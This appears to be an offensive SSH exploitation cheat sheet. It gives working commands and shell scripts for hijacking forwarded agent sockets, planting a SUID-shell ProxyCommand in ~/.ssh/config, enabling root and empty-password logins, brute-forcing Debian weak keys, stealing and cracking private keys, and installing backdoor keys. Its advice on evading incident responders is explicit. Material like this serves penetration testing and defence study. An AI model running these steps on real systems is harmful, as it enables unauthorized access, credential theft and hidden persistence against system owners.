
SSH Agent Forwarding Hijack

Every ssh-agent, whether started locally or created by sshd for a forwarded connection, listens on a Unix socket, by default /tmp/ssh-XXXXXXXXXX/agent.PID inside a directory that is mode 0700 and owned by the connecting user. Whoever can open that socket (root, or a process running as that user) can ask the agent to sign authentication challenges and so log in to every remote host that trusts the user's keys, without ever seeing the private keys. Forwarded agents are the interesting case: the key never lives on this box, yet while the user's session is up it can be used from here. Everything below therefore assumes you are root or already share the victim's uid.

Find Active Agent Sockets

find /tmp -name "agent.*" -type s 2>/dev/null
ls -la /tmp/ssh-*/

Identify Socket Owner

# Find which process holds the socket open (the sshd session or the ssh-agent)
lsof /tmp/ssh-XXXXXXXX/agent.YYYY 2>/dev/null

# Or check the environment of every process you may read: the file name
# gives the PID, and /proc/PID/status its uid (-a stops grep treating
# the NUL-separated environ as binary)
grep -az SSH_AUTH_SOCK /proc/*/environ 2>/dev/null | tr '\0' '\n'

Hijack Agent

export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.YYYY
ssh-add -l
If keys are listed, the agent will sign for you. ssh-add -L prints the full public keys, whose comments often name the owner and the host they came from, which tells you where to try them:
ssh root@internal-server
ssh admin@other-host
The agent never hands out the private key, only signatures, so this works only while the victim's session (and with it the socket) exists, and only against hosts that already trust those keys.

Automate Discovery

find /tmp -name "agent.*" -type s 2>/dev/null | while IFS= read -r sock; do
    # ssh-add -l exits 0 only when it could connect and the agent holds keys
    if keys=$(SSH_AUTH_SOCK=$sock ssh-add -l 2>/dev/null); then
        echo "=== $sock ==="
        echo "$keys"
    fi
done
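The environment-scan idea above, worked into a script that attributes each socket to a process and uid before probing it, so you know whose session you are riding and can skip stale sockets. This is an added example, not code from the original page; it assumes a Linux /proc layout, and the optional root argument is a hypothetical convenience so the scanner can be pointed at a copied or constructed tree.

```sh
#!/bin/sh
# Added example: enumerate SSH_AUTH_SOCK values from process environments,
# attribute each to a pid/uid, then probe the unique sockets with ssh-add.
# Assumes a Linux /proc; the optional root argument is a hypothetical
# convenience for pointing the scanner at a copied or constructed tree.

# Print "pid uid socket" for every process whose environment names an agent
# socket. /proc/PID/environ is readable only by the same uid or root, so as
# an unprivileged user you will only see your own sessions here.
auth_socks_from_proc() {
    root=${1:-/proc}
    for env in "$root"/[0-9]*/environ; do
        [ -r "$env" ] || continue
        dir=${env%/environ}
        pid=${dir##*/}
        # environ is NUL-separated; turn it into lines and pull the variable
        sock=$(tr '\0' '\n' < "$env" 2>/dev/null | sed -n 's/^SSH_AUTH_SOCK=//p' | head -n 1)
        [ -n "$sock" ] || continue
        # Real uid is the second field of the Uid: line in status
        uid=$(awk '/^Uid:/ { print $2 }' "$dir/status" 2>/dev/null)
        printf '%s %s %s\n' "$pid" "${uid:-?}" "$sock"
    done
}

# Several processes of one session share a socket; probe each path once.
unique_auth_socks() {
    auth_socks_from_proc "$1" | awk '{ print $3 }' | sort -u
}

# Ask the agent behind a socket for its identities. ssh-add -l exits 0 with a
# listing when the agent is reachable and loaded, 1 when it holds no keys,
# and 2 when the socket cannot be opened (wrong uid, or a stale path left
# behind by a finished session).
probe_agent() {
    sock=$1
    if [ ! -S "$sock" ]; then
        echo "$sock: not a socket (stale?)" >&2
        return 2
    fi
    if keys=$(SSH_AUTH_SOCK=$sock ssh-add -l 2>/dev/null); then
        printf '=== %s ===\n%s\n' "$sock" "$keys"
        return 0
    fi
    return 1
}

# Stand-alone use: sh agent_scan.sh --run
if [ "${1:-}" = "--run" ]; then
    echo "# pid uid socket"
    auth_socks_from_proc
    unique_auth_socks | while IFS= read -r s; do
        probe_agent "$s"
    done
fi
```

Run it as root to see every session; the pid/uid column is what separates a forwarded agent belonging to an admin from your own, and a socket that fails the -S test is a leftover directory from a closed session rather than a target.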

Writable SSH Config

/etc/ssh/sshd_config

ls -la /etc/ssh/sshd_config
If it is writable by you (it should be root:root 0644), remember that edits take effect only when sshd is reloaded or restarted, which needs root: either you already have root and are persisting, or you plant the change and wait for an admin restart. Enable root login and password auth:
PermitRootLogin yes
PasswordAuthentication yes
PermitEmptyPasswords yes
PermitEmptyPasswords only helps if the account's password field really is empty; otherwise you still need root's password. Run sshd's config test (sshd -t) before reloading: a syntax error makes sshd keep rejecting the new config, and a restart would then lock everyone out, you included.
Reload (the unit is sshd on RHEL-style systems and ssh on Debian/Ubuntu):
systemctl reload sshd

~/.ssh/authorized_keys

If writable for another user:
ls -la /home/*/.ssh/authorized_keys
ls -la /root/.ssh/authorized_keys 2>/dev/null
Add your key:
ssh-keygen -t ed25519 -f /tmp/key -N ""
cat /tmp/key.pub >> /root/.ssh/authorized_keys
ssh -i /tmp/key root@localhost
With StrictModes yes (the default) sshd ignores authorized_keys when that file, ~/.ssh or the home directory is owned by someone else or is group/world-writable. An authorized_keys you can write only because it is mode 0666 is therefore useless unless StrictModes is off; the write has to arrive through something that preserves the user's ownership and 0600/0700 modes, such as a cron job, sudo rule or setuid helper that writes on your behalf.

~/.ssh/config

If writable, inject a ProxyCommand. It runs with the privileges of whoever next invokes ssh, so the example below yields a root-owned SUID shell only when that user is root:
Host *
    ProxyCommand /bin/bash -c 'cp /bin/bash /tmp/rootbash && chmod +s /tmp/rootbash'
Triggers on the next SSH connection by that user; run the result as /tmp/rootbash -p, since bash drops the effective uid without -p. The same ownership and mode checks apply as for authorized_keys: the client refuses a ~/.ssh/config that it does not own or that others can write ("Bad owner or permissions"). As written the command swallows the connection, so the user's ssh fails and they will notice; ssh_config's %h and %p tokens let a ProxyCommand hand the real connection through after the payload has run.

Debian Weak Keys (CVE-2008-0166)

A Debian patch to OpenSSL's random number generator, shipped from September 2006 until 13 May 2008, removed nearly all entropy from key generation and left the process ID as the only variable input. Any key generated on an affected system is therefore one of roughly 32,768 possibilities per key type, size and architecture, and all of them have been pre-generated.

Check

cat /etc/debian_version
# Affected: Debian's openssl from 0.9.8c-1 until the May 2008 fix (0.9.8c-4etch3 / 0.9.8g-9),
# i.e. Debian 4.0 (Etch), Ubuntu 7.04-8.04 and derivatives
# The target's version only matters if the key was generated there; a weak key
# copied from such a box stays weak wherever it is used
Debian and Ubuntu of that era shipped ssh-vulnkey (openssh-blacklist) to flag affected keys; on a modern host you compare against the pre-generated set instead.

Exploit

Download the pre-generated keys (the repository ships them as compressed archives; extract the set matching the target key's type and size, and make sure the private files are mode 0600 or ssh will refuse them):
https://github.com/g0tmi1k/debian-ssh
Try each key against the target. BatchMode stops ssh from prompting, the timeout keeps a dead host from stalling the loop, and running true instead of a shell makes a hit exit immediately:
for key in rsa/2048/*.pub; do
    ssh -i "${key%.pub}" -o BatchMode=yes -o StrictHostKeyChecking=no -o ConnectTimeout=5 root@TARGET true 2>/dev/null && echo "FOUND: $key"
done
That is up to 32,768 connections per user: sshd's MaxStartups and any fail2ban-style tooling will throttle or blacklist you, and every attempt lands in auth.log.
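Brute-forcing logins is loud. If you already hold a public key from the target (an authorized_keys or id_*.pub you could read), check it against the weak set offline instead: identical keys have identical base64 blobs, so a text comparison settles it without a single connection. The helper below is an added example, not code from the original page or from the debian-ssh repository; it assumes the weak set has been extracted to a directory of .pub files (the rsa/2048 layout the loop above uses), and the keys its test uses are constructed strings, not real weak keys.

```sh
#!/bin/sh
# Added example: match public keys found on a host against an extracted
# weak-key set by base64 blob, without touching the network.

# Build "blob path" lines from every .pub in the weak set. Field 2 of a
# ssh-keygen .pub file is the base64-encoded key blob.
index_weak_pubkeys() {
    for p in "$1"/*.pub; do
        [ -r "$p" ] || continue
        awk -v p="$p" 'NF >= 2 { print $2, p }' "$p"
    done
}

# Print "LINE: weak_key_path" for every key in an authorized_keys (or .pub)
# file whose blob is in the set. authorized_keys lines may start with
# options (from=, command=, ...), so the blob is taken as the field after
# the key type rather than assumed to be field 2.
match_weak_pubkeys() {
    weak=$1
    target=$2
    idx=$(mktemp) || return 2
    index_weak_pubkeys "$weak" > "$idx"
    if [ ! -s "$idx" ]; then
        rm -f "$idx"
        echo "no .pub files under $weak" >&2
        return 2
    fi
    awk '
        NR == FNR { weak[$1] = $2; next }   # first file: the index
        /^[[:space:]]*#/ { next }           # comment lines
        NF == 0 { next }                    # blank lines
        {
            for (i = 1; i < NF; i++)
                if ($i ~ /^ssh-(rsa|dss)$/) {
                    if ($(i + 1) in weak) print FNR ": " weak[$(i + 1)]
                    break
                }
        }' "$idx" "$target"
    rm -f "$idx"
}

# Stand-alone use: sh weak_match.sh /path/to/rsa/2048 /root/.ssh/authorized_keys
if [ $# -eq 2 ]; then
    match_weak_pubkeys "$1" "$2"
fi
```

A hit names the weak .pub file; strip the .pub suffix to get the matching private key and log in with it directly. Only ssh-rsa and ssh-dss are checked because those are the types the bug produced; an ed25519 or ecdsa line in authorized_keys cannot be a Debian weak key.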

SSH Private Keys on Disk

Find Keys

find / -type f \( -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" -o -name "id_dsa" \) 2>/dev/null
# Match on the PEM banner rather than on "ssh" in the path, which misses most keys
find / -type f \( -name "*.pem" -o -name "*.key" -o -name "*_key" \) -print0 2>/dev/null | xargs -0 grep -l -- "-----BEGIN .*PRIVATE KEY-----" 2>/dev/null
Check /etc/ssh/ssh_host_*_key as well: a readable host private key lets you impersonate the server to its clients, and backup, CI and config-management directories often hold copies of user keys under arbitrary names.

Check Permissions (Readable?)

ls -la /home/*/.ssh/id_* 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null

Use Found Key

chmod 600 stolen_key   # ssh refuses a key file others can read ("UNPROTECTED PRIVATE KEY FILE")
ssh -i stolen_key user@TARGET

Crack Passphrase

If the key is encrypted (PEM keys carry a Proc-Type: 4,ENCRYPTED header; OpenSSH-format keys show nothing in the banner, but ssh-keygen -y -f key prompts for a passphrase):
ssh2john id_rsa > hash.txt
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
ssh2john lives at /usr/share/john/ssh2john.py on Kali (ssh2john.py in the John jumbo tree). OpenSSH-format keys use a bcrypt KDF with a rounds parameter (16 by default), so each guess is expensive; budget for a wordlist, not a mask attack.
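Before spending cracking time, triage what the find commands turn up: which files are really private keys, in what container format, and whether they are encrypted, so cleartext keys get tried first. The helper below is an added example, not part of the original page; it recognises the PEM and OpenSSH-format banners, reads the Proc-Type header for PEM and the kdfname field of the OpenSSH format (the string bcrypt sits in the first bytes of the decoded blob when a passphrase was set). The filename patterns it searches are an assumption about common naming, and the key files in its test are constructed stand-ins, not real keys.

```sh
#!/bin/sh
# Added example: classify candidate private-key files and flag the encrypted
# ones so cleartext keys are tried first and ssh2john time goes where needed.

# Container format from the first-line banner, or "none" for non-keys
# (public keys, certificates, random .pem files).
key_kind() {
    case $(head -n 1 "$1" 2>/dev/null) in
        '-----BEGIN OPENSSH PRIVATE KEY-----') echo openssh ;;
        '-----BEGIN RSA PRIVATE KEY-----'|'-----BEGIN DSA PRIVATE KEY-----'|'-----BEGIN EC PRIVATE KEY-----') echo pem ;;
        '-----BEGIN ENCRYPTED PRIVATE KEY-----') echo pkcs8-encrypted ;;
        '-----BEGIN PRIVATE KEY-----') echo pkcs8 ;;
        *) echo none ;;
    esac
}

# Exit 0 when a passphrase is required. PEM keys advertise it in a
# Proc-Type header; OpenSSH-format keys store ciphername and kdfname right
# after the "openssh-key-v1" magic, so "bcrypt" appears within the first
# few dozen bytes of the base64-decoded body ("none"/"none" otherwise).
key_is_encrypted() {
    case $(key_kind "$1") in
        pem)             grep -q '^Proc-Type: 4,ENCRYPTED' "$1" ;;
        openssh)         sed '1d;$d' "$1" | base64 -d 2>/dev/null | head -c 64 | grep -qa bcrypt ;;
        pkcs8-encrypted) return 0 ;;
        *)               return 1 ;;
    esac
}

# Walk a tree and print "path format cleartext|encrypted" for every readable
# file that carries a private-key banner. The name patterns are an assumption
# about common naming; a banner grep over the whole tree is the thorough option.
triage_keys() {
    dir=${1:-/}
    find "$dir" -type f \( -name 'id_*' -o -name '*.pem' -o -name '*.key' -o -name '*_key' \) 2>/dev/null |
    while IFS= read -r f; do
        [ -r "$f" ] || continue
        kind=$(key_kind "$f")
        [ "$kind" = none ] && continue
        if key_is_encrypted "$f"; then state=encrypted; else state=cleartext; fi
        printf '%s %s %s\n' "$f" "$kind" "$state"
    done
}

# Stand-alone use: sh key_triage.sh /home   (or / for the whole box)
if [ -n "${1:-}" ]; then
    triage_keys "$1"
fi
```

Feed the cleartext rows straight to ssh -i and only the encrypted rows to ssh2john; a pkcs8-encrypted file (PKCS#8 with its own KDF) is typically a TLS or service key rather than an SSH one, which changes where you would try it.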

SSH Persistence

Add Key to Root

mkdir -p /root/.ssh
echo "ssh-ed25519 AAAA... attacker@host" >> /root/.ssh/authorized_keys
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys

Generate Key Pair on Target

ssh-keygen -t ed25519 -f /root/.ssh/backdoor -N ""
cat /root/.ssh/backdoor.pub >> /root/.ssh/authorized_keys
cat /root/.ssh/backdoor  # Copy the private key off the box
Once copied, remove backdoor and backdoor.pub from the target: the authorized_keys line is all sshd needs, and a stray private key with a name like that in /root/.ssh is the first thing a responder will notice.

Quick Reference

Technique                  Requirement
Agent forwarding hijack    Live agent socket you can open (root, or the victim's uid)
Writable authorized_keys   Write to the user's ~/.ssh/authorized_keys without breaking StrictModes ownership/modes
Writable sshd_config       Write to /etc/ssh/sshd_config, plus a reload or restart of sshd
Debian weak keys           Key generated on Debian Etch / Ubuntu 7.04-8.04 era OpenSSL
Private key theft          Readable private key file (and its passphrase, if set)